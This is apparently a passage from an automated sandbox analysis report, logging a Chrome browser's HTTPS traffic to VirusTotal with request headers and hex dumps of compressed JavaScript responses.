                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 47 30 f4 4a bd f6 0d c1 63 6c 70 21 c2 b7 04 63 2f 1f 40 cc 6f 08 f6 b0 01 07 cd 47 82 7d 0f 85 a1 8b 11 6c 07 76 04 f8 0f 82 b1 73 b6 c0 ff 03 c1 2e 76 a6 e8 65 12 1d 8d 21 da 33 82 83 31 b5 cf 2b 02 fd b1 ed 43 fa a7 04 3b d0 31 48 7e 64 12 0c 3d 48 f6 1b c3 91 47 43 ef 07 82 c7 96 4f 8a fd 99 60 db 41 37 45 77 63 3c b4 8f bc df 11 4c db 64 e4 fd 9e e1 80 46 d2 4f 04 62 32 a0 91 f0 4f 82 23 ec c5 c1 f2 5f 04 db dc 0c ff 26 10 bb 76 d2 59 51 02 1e a3 6d a1 b3 92 60 3f b2 69 90 c1 80 a2 a6 42 5e 74 3a 82 bd 00 fb 56 74 3a 82 03 ec 4f c1 be 66 3c 3c 1f a0 a9 08 46 3f 73 a8 d7 11 1c c1 a9 00 9a 84 60 54 9c 37 b4 4c 1f 85 54 c3 15 c3 01 b8 a2 07 12 1c 8c c1 08 3d 90 e0 d0 a2 5d af be 61 1a 2b 74 c1 7f 49 30 64 a6 be b0 66 3c 1c 18 d0 fd 82 61 f8 54 40 b3 25
                                                                                                                                                                                                                    Data Ascii: G0Jclp!c/@oG}lvs.ve!31+C;1H~d=HGCO`A7Ewc<LdFOb2O#_&vYQm`?iB^t:Vt:Of<<F?s`T7LT=]a+tI0df<aT@%
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC419INData Raw: 14 ac e3 1f 08 af 3e 64 52 36 9d c2 af f0 33 f0 0c 31 b2 4a 2e 44 fc 67 01 9f fe 85 6a c7 4a 24 65 ba 84 8b b3 c6 34 80 b9 fe 7b 24 32 ea a5 c4 70 b6 81 a2 82 17 b2 04 cd 3f 1b 9a f7 f4 2d 19 73 9e f8 bb 26 45 21 e9 2c 05 0a 8b ff 45 78 f5 a1 92 ea 1a 43 b4 8a ff 4d 29 12 96 09 b0 c8 44 5c c0 e9 45 80 44 65 8b 75 12 97 40 11 a0 50 3c aa 62 41 48 06 bb 68 69 6f fc d4 c8 f2 b6 19 82 b0 42 98 6c 50 41 7f 86 6d 44 30 5d c1 00 1f 76 24 f3 93 86 73 89 52 94 75 52 d2 82 be a2 89 ba 42 0a be bf e5 4f 99 01 9f 71 2d d1 2a c3 76 aa 0c 80 0c e8 ed 14 c4 8d a6 b7 d3 59 56 42 21 45 79 6d 48 c3 57 19 7b 09 53 b6 89 f0 c4 15 97 1d bb af ba 4c 36 c6 b2 28 b3 8f 83 78 06 52 7c 3e a3 2f 2e b0 ce d6 82 d6 91 78 55 9a 0d dc 26 60 ac c5 53 89 07 28 05 24 a2 ce 00 da c8 e4 bd
                                                                                                                                                                                                                    Data Ascii: >dR631J.DgjJ$e4{$2p?-s&E!,ExCM)D\EDeu@P<bAHhioBlPAmD0]v$sRuRBOq-*vYVB!EymHW{SL6(xR|>/.xU&`S($
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 5a 0d 0a 30 30 30 30 30 30 30 31 0d 0a e1 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a c5 0d 0a 30 30 30 30 30 30 30 31 0d 0a 92 0d 0a 30 30 30 30 30 30 30 31 0d 0a 47 0d 0a 30 30 30 30 30 30 30 31 0d 0a c6 0d 0a 30 30 30 30 30 30 30 31 0d 0a 63 0d 0a 30 30 30 30 30 30 30 31 0d 0a 22 0d 0a 30 30 30 30 30 30 30 31 0d 0a d7 0d 0a 30 30 30 30 30 30 30 31 0d 0a d0 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 31 0d 0a 0a 0d 0a 30 66 66 33 0d 0a a1 68 70 52 02 6b d4 48 57 19 76 00 02 24 33 9a c1 ce f0 c9 04 d7 49 99 c0 8d 6b d2 af cc c1 cb a5 ea 6b 6a 6b a2 d6 50 ee 63 ed f6 04 46 75 2e d5 56 c5 67 64 62 37 5f cc 26 9b 55 71 4e a5 f1 e8 b9 bd d5 d9 c7 d7 ef 31 6c f7 7b d2 a9 d9 d9 00 76 bc 87
                                                                                                                                                                                                                    Data Ascii: 00000001Z0000000100000001000000010000000100000001G0000000100000001c00000001"000000010000000100000001w00010ff3hpRkHWv$3IkkjkPcFu.Vgdb7_&UqN1l{v
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 43 0a 46 e9 e7 b8 3b e2 e8 6f 8d 0a 5e f5 5c 94 df 16 db b2 66 f7 1d 42 d3 28 ac e5 08 d7 bd 4d 77 73 66 72 48 3a 0a 89 e9 e5 d3 9c ad f4 8b 26 f2 0b b1 c2 19 87 9c 62 38 a8 a6 9f db ee 54 a6 9f 21 8c 8f 97 3b 3a d8 6d 14 8f d3 cf b2 39 c2 51 8d d1 1e e9 1c a8 2a 47 f3 1c e1 a4 4e 7e 5a 4e ea fb 00 27 8a 05 ea 67 74 ff 94 a8 61 79 3f e5 00 73 8e 2e ea e5 be 7f bc c4 8c ff 53 9b eb 0b 0c ab ff 9f 1e 2c 5a f4 69 8d f6 4d dc 96 31 c7 1f 7c d3 4e 2d 83 1c 51 96 e9 19 36 fe 3f 36 ec a5 9f 5a a6 af 5b f4 85 7f 80 c8 3f 85 05 3d 64 2f 14 78 34 06 00 dc 70 9b 86 25 fc 5d b8 99 63 99 ee 33 db 4e c1 d2 d5 89 b1 8f 7f 8e fa f5 2b 05 13 53 c2 2d 03 33 44 51 28 44 b7 cd 00 18 78 cd f0 6b 9b d1 07 f0 a0 ec 60 22 b3 37 59 c0 82 e4 71 e8 9b fe b5 de 39 d8 90 81 e9 9d 91
                                                                                                                                                                                                                    Data Ascii: CF;o^\fB(MwsfrH:&b8T!;:m9Q*GN~ZN'gtay?s.S,ZiM1|N-Q6?6Z[?=d/x4p%]c3N+S-3DQ(Dxk`"7Yq9
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 12 71 b9 c4 c1 16 b1 9f cf 25 02 91 7c d7 f8 0e f8 cf 0e 65 e0 ae 10 65 74 f9 4f 07 6f 5b 16 65 8f e8 6f 07 8d 88 2d 42 3b f4 b7 83 46 bd 80 16 01 fd ed a0 3d 46 a7 fc a7 83 c6 cb 32 a0 9e ba f4 b7 83 c6 6d 3c a0 ef 49 18 32 da 9b d1 df 0e f5 98 d1 f7 e4 c6 6b 3a 60 62 27 f4 57 52 e3 2e 0a 82 12 a8 f2 dd 46 ae b6 69 8a a0 1f 60 bb da e6 b8 7e 6a d0 70 da 54 a4 09 64 dc 6f bf 19 b5 69 89 dc dd 96 56 25 19 e5 62 1a 23 38 4c d7 f0 92 90 e6 d8 63 29 87 2a 51 a6 e2 c1 1c cd c6 33 3d 5a a8 f4 c5 71 91 9c d1 42 8a e3 22 a3 ab fa 8a 92 40 66 74 f0 f8 0e 78 fb ba a6 52 a5 24 aa 4c bc 82 a3 e1 f5 1b cd 6d 7a ad ac 3b 3f c1 60 e0 c9 12 dc 7a cf a8 ce 56 e0 4c 43 d5 ae 15 5e 79 a1 2b 63 d7 f7 a8 10 19 88 bf fb d2 d3 f1 6c 97 13 5e 48 b2 9c 76 e0 e0 da c4 5d 02 bc 22
                                                                                                                                                                                                                    Data Ascii: q%|eetOo[eo-B;F=F2m<I2k:`b'WR.Fi`~jpTdoiV%b#8Lc)*Q3=ZqB"@ftxR$Lmz;?`zVLC^y+cl^Hv]"
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC32INData Raw: 68 16 56 73 f3 0e 4b 73 2f 1e 4e 6d 57 87 5d ca 1a 7e 04 dc f2 39 90 42 53 4f 14 61 e2 b8 0d 0a
                                                                                                                                                                                                                    Data Ascii: hVsKs/NmW]~9BSOa
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC633INData Raw: 30 30 30 30 30 30 30 31 0d 0a c7 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 27 0d 0a 30 30 30 30 30 30 30 31 0d 0a 63 0d 0a 30 32 33 64 0d 0a 6c d1 0f 25 71 1a 6c ad 0d 46 0d 1e 2c 99 e3 66 9f a8 34 5c 10 86 d7 a1 42 18 2d da 93 1e 3f db 88 ea c6 fa db cd 2e 8e d7 68 5e e9 33 ae d8 8c bb ed 66 57 d1 56 08 c2 a5 21 79 53 17 37 bc 3c d1 20 c7 60 a3 a3 42 bc d6 43 a6 e7 e8 60 36 44 0a 5f 52 69 bb 4c 15 dd 56 c3 d3 70 b7 3e d0 cd 9c 66 9f ee 08 68 e1 df e3 c5 4f d5 2d 39 5e d4 c0 2b 01 97 37 dd 9c a6 65 f7 12 5f e2 6a f0 0d dc 1c 7f 6b fb dc 3a a9 ce db ea c6 f0 48 59 7f d3 ac bf 9d 1e 46 df de 9a f2 25 c9 9b 59 86 c7 f0 e0 5d a1 d7 1c 4f e9 7f b8 39 49 d7 5f c9 50 41 05 4f 79 2e c1 63 0a 62 5d c5 f2 25 19 85 a2 57 8d 63 28 5d
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001'00000001c023dl%qlF,f4\B-?.h^3fWV!yS7< `BC`6D_RiLVp>fhO-9^+7e_jk:HYF%Y]O9I_PAOy.cb]%Wc(]
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    123192.168.2.164987474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC689OUTGET /gui/13870.5eac014aaa55fec657a1.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: e9cf86eabc5931712d7ef8d135e32369
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:55:25 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:55:25 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36002
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a c4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 79 0d 0a 30 30 30 30 30 30 30 31 0d 0a 93 0d 0a 30 66 66 32 0d 0a db c6 b1 ff 3f 9f 02 4b 25 32 61 03 58 1e cb 3d 40 53 b2 a3 28 15 57 d9 71 ca 72 92 aa 48 aa 3c 90 18 92 b0 40 80 01 c0 3d c2 e5 77 7f bf ee 39 30 00 c1 5d db c9 ab e7 b5 76 c9 99 9e 9e 9e ee 9e be 66
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001\00000001y000000010ff2?K%2aX=@S(WqrH<@=w90]vf
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 5c 3b bc c4 fb bc e8 05 e5 36 4d aa 7e cf e9 b9 41 21 e2 dd 42 f4 fb ac bb b3 57 db fe b6 bf 3f 78 85 eb e1 f7 1e cc 66 b6 d3 37 77 2a b9 29 66 fb aa 80 dc 20 9a 65 94 96 2c 17 af 9a 9d bf ff e2 83 ff f9 cb df cd be 7c 75 f6 fa f1 c3 f9 c7 f3 da 12 27 40 9e 68 69 94 b3 22 c8 c4 7d d5 97 ea fb 02 2a 55 be 7c 99 04 bc 92 ef 97 df c2 46 68 0d 2e 82 f2 53 b2 fd 31 7f 9b c5 7d d7 eb 11 3b 7a b4 3f ce df 7f 78 ff e1 e3 fe f0 a1 ff c1 f5 a6 1f c2 0f c1 c7 f3 a0 12 65 d5 2f 5d 3d 96 0c 1e c3 7e 88 8f fa 8a 40 44 d5 df d7 90 22 a1 ba a3 e1 40 0f 1b 0c 75 e6 09 7a e7 44 95 4b 5b 99 61 fb 68 30 98 5b 54 2d f2 0d 19 5d 1e a7 80 3f af 81 13 6c ee 4f 22 83 b2 cc 32 2f 63 3e 1c 80 f5 b3 de 67 98 00 7b 59 4e a4 36 a0 05 dc 8f 66 a5 d7 b4 2b a9 a8 1c 38 83 d9 d9 10 be f4
                                                                                                                                                                                                                    Data Ascii: \;6M~A!BW?xf7w*)f e,|u'@hi"}*U|Fh.S1};z?xe/]=~@D"@uzDK[ah0[T-]?lO"2/c>g{YN6f+8
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 85 b1 4f ad 9d 38 eb 29 cd 15 31 a9 97 09 fc 7e 84 17 13 95 34 3f 58 4a 16 63 8b 34 7c 07 e9 a5 db 5f c1 c2 ad 66 cb ff f9 32 4e 6e 1d e6 c9 ac 77 0b 0b b7 f8 e4 ac a2 ad 3f 72 ee fc e1 60 d0 7b e5 fc 76 3f 38 38 5f 6e 0b e4 74 e4 50 31 6d e9 5f 3a 9b 35 75 3b f9 ad 28 96 69 7e e7 47 bb 2a 77 36 fe c0 89 7d 84 11 f7 3d 1e f6 ea 37 34 f8 cb 73 0c 7e e5 7c 79 8e 99 5e fd 8f d2 33 6b d7 59 f6 c4 6c a3 d7 f0 84 19 ef 20 b7 bf 01 a5 9b 16 a5 6b 49 e9 4f 30 f6 c9 f2 c1 a7 44 11 0e c0 c7 6a 41 b1 bd a4 79 95 f9 ab 22 df 6d 7b 0e 04 01 bf 2d bf 00 28 c9 b6 bb ca a1 00 67 d6 2b a2 38 c9 7b 7a 81 34 06 59 e3 e2 53 cf c9 a0 27 86 d1 94 b5 3b 49 3c eb e5 45 b2 4a b2 28 ed c9 e4 de 6e 20 3e 20 86 dd 22 b6 c3 c0 7c b9 ec 39 01 e3 82 a7 ef 11 37 7a ce 57 52 d0 ea 2b 28
                                                                                                                                                                                                                    Data Ascii: O8)1~4?XJc4|_f2Nnw?r`{v?88_ntP1m_:5u;(i~G*w6}=74s~|y^3kYl kIO0DjAy"m{-(g+8{z4YS';I<EJ(n > "|97zWR+(
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC404INData Raw: 82 03 5b 96 56 92 a1 5a 99 c4 48 cb 1b 3d 75 e0 07 53 89 63 e7 92 e4 a3 1c b8 da fb 23 1d f1 1c 9a 6e d1 21 cf 65 7b 3e 2e f9 60 7c 8b 5b 83 f9 e0 b9 91 08 12 4e 0c 8e 46 d8 f1 16 91 1a 8c 98 5d c7 5e 61 b1 9a 47 fd d1 64 e2 39 c3 c9 c0 73 e8 ff 60 ec 36 46 46 88 52 6f 05 6f dc 7a a0 8d e3 85 b8 5e 8e 96 4b 7b 50 6d 75 0b 91 b2 85 6a db d4 69 8d ab 23 82 94 f1 e8 de d8 61 f9 dd 0e 44 10 98 a1 ca e2 2b 56 4b fb ad da a4 61 97 4d 2a 8a d6 70 6c e6 55 48 8e 0a d5 ef a6 aa 90 82 48 13 d1 96 31 d5 86 68 1d b8 34 22 30 9f ee 24 20 fc d4 8e c5 40 37 e2 37 9a 4a 05 bc b6 f3 b5 65 72 6b c2 ee 46 bc bd ee 6e 36 ad cf c7 e8 86 34 e3 f3 f4 42 2e 91 77 48 7f ca 2b b6 97 6f cb cf af 49 db db 7e b2 76 8d fe bd 72 8e 46 b0 fe 43 28 49 6c 20 aa 17 83 dd a1 dc ab 72 c0 5a
                                                                                                                                                                                                                    Data Ascii: [VZH=uSc#n!e{>.`|[NF]^aGd9s`6FFRooz^K{Pmuji#aD+VKaM*plUHH1h4"0$ @77JerkFn64B.wH+oI~vrFC(Il rZ
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 58 0d 0a 30 30 30 30 30 30 30 31 0d 0a ee 0d 0a 30 30 30 30 30 30 30 31 0d 0a 15 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 30 30 30 31 0d 0a 14 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 34 0d 0a 30 30 30 30 30 30 30 31 0d 0a d4 0d 0a 30 30 30 30 30 30 30 31 0d 0a a4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 99 0d 0a 30 30 30 30 30 30 30 31 0d 0a 65 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 30 30 30 30 31 0d 0a 25 0d 0a 30 30 30 30 30 30 30 31 0d 0a e6 0d 0a 30 30 30 30 30 30 30 31 0d 0a f6 0d 0a 30 30 30 30 30 30 30 31 0d 0a c6 0d 0a 30 30 30 30 30 30 30 31 0d 0a ef 0d 0a 30 30 30 30 30 30 30 31 0d 0a ea 0d 0a 30 30 30 30 30 30 30 31 0d 0a 97 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                    Data Ascii: 00000001X000000010000000100000001000000010000000100000001400000001000000010000000100000001e00000001w00000001%00000001000000010000000100000001000000010000000100000001
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 4b 3a d4 8c b2 77 82 9e e1 d5 08 20 8a 5f 34 b3 ec 82 63 1f 8e c6 18 38 d6 b2 94 86 4d f6 8e 46 37 e8 1f a2 80 a8 7a 25 25 6a ce 1b a0 1d 5f e2 9f d6 5a 69 86 7c 3e 16 10 9b 2d ee 9f 26 25 2d f0 72 34 bf 52 72 ad 3d 4d 1b 0a a7 18 f8 69 52 7f 04 33 b8 1c 8c cc c6 c1 1a da 00 83 c1 c5 c5 75 6b 25 6d 98 eb 01 34 a5 b9 9e 36 c8 65 3c bc 18 aa 55 f1 0d f0 a3 89 6c 0d 21 ad 7e 12 40 8b 6a be 52 c7 c8 24 ca 65 1c 2f 95 9e d6 4c b1 21 c4 80 7e 9a 0c 69 f4 2f 96 37 02 c9 33 6d 7b 16 68 a3 73 b2 1c eb dd a8 94 0a be bd 9e 1e 5b 75 24 d4 7e 56 42 6d 74 47 62 a8 e7 96 0c 68 f4 2e 96 f8 91 33 f3 e2 ed 4e 7b 03 9a 85 73 b0 58 cf 7e 13 cf af 97 7a 69 fa 96 9b 0a 29 6b a8 c5 88 7e 5a 0c 68 61 9a 0f 62 31 57 a6 4a 32 a1 05 70 73 b3 88 96 6a a1 86 11 2d 98 e5 64 71 85 3b
                                                                                                                                                                                                                    Data Ascii: K:w _4c8MF7z%%j_Zi|>-&%-r4Rr=MiR3uk%m46e<Ul!~@jR$e/L!~i/73m{hs[u$~VBmtGbh.3N{sX~zi)k~Zhab1WJ2psj-dq;
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1346INData Raw: 01 6e bd 11 0e 99 49 e0 69 2a 7d 49 e8 1e a1 43 23 ee b0 fa d8 93 59 41 07 ba 6c 63 e1 28 46 e9 e6 76 96 a1 db 75 92 81 92 53 3d c2 b6 27 56 8e 81 31 ca 4f 1a 9b 5e a7 17 3a 1e 01 10 85 7a f6 51 be 59 97 32 3b ca 53 5b 48 d8 1a 71 b3 8d 46 1a 29 35 e5 53 08 29 ad c3 15 84 13 d1 92 85 52 c6 b9 4d af 7a 02 b1 8e 49 7e 7e dc 84 95 6b 9d f0 b5 68 11 3f e8 0c 8d 39 8e e3 48 d4 0c 1a b8 39 2e 93 01 16 87 1f 35 5b cc 08 19 c1 51 64 8e 3c 34 40 3c d2 79 5d 47 9b f7 06 02 ad 4a 0f ae c5 1d 20 d6 ed f7 cd 53 a2 c6 58 4b 9f 6c 6f 7d 0c 43 ca a5 20 94 3e 1d c3 c8 0e 77 6a eb 56 03 ca ea 38 3e d4 02 c5 ac 07 78 7c 16 66 56 5d 48 a2 10 5f e0 4d 14 cd 6b 4a d2 c7 4e d5 71 aa da 97 66 2f e2 38 b8 50 f7 e4 e5 26 e4 73 cb 8e d6 d2 3f 6a 3c 6a 90 8a 64 9d bd 81 4c 5b c7 5d
                                                                                                                                                                                                                    Data Ascii: nIi*}IC#YAlc(FvuS='V1O^:zQY2;S[HqF)5S)RMzI~~kh?9H9.5[Qd<4@<y]GJ SXKlo}C >wjV8>x|fV]H_MkJNqf/8P&s?j<jdL[]
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    124192.168.2.164987674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC566OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/submissions/add HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC262INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Allow: HEAD, POST, OPTIONS
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 0cd8cd0d836eed11b2dc87c0f388e192
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:27 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 178
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC178INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 33 2e 32 20 46 69 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 6d 65 74 68 6f 64 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 2e 3c 2f 70 3e 0a
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><title>405 Method Not Allowed</title><h1>Method Not Allowed</h1><p>The method is not allowed for the requested URL.</p>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    125192.168.2.164987574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC688OUTGET /gui/6829.6c727ee07d052c60889f.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: c2d6d5af4a7d490439983ba18b3b6c59
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:35:18 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:35:18 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 37209
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6f 0d 0a 30 30 30 30 30 30 30 31 0d 0a db 0d 0a 30 30 30 30 30 30 30 31 0d 0a c8 0d 0a 30 30 30 30 30 30 30 31 0d 0a 15 0d 0a 30 30 30 30 30 30 30 31 0d 0a fd 0d 0a 30 30 30 30 30 30 30 31 0d 0a de 0d 0a 30 30 30 39 64 66 0d 0a
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001[00000001k00000001o00000001000000010000000100000001000000010009df
